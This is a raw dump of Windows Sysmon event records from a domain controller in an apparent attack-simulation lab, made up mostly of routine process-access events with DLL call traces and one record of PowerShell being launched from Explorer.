22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967868C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967868C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961124C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8e7a1|C:\Windows\System32\SHELL32.dll+8d606|C:\Windows\System32\SHELL32.dll+ce551|C:\Windows\System32\SHELL32.dll+b475e|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+ce5d7|C:\Windows\System32\SHELL32.dll+b475e|C:\Windows\System32\SHELL32.dll+17046f 154100x80000000000000001694544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.032{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exeC:\Windows\explorer.exe /NOUACCHECK 10341000x80000000000000001694543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-22AF-6039-2700-00000000AD01}27765668C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001694539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.020{05ADC7E1-22AF-6039-2700-00000000AD01}27765668C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000001694538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001694535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001694534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 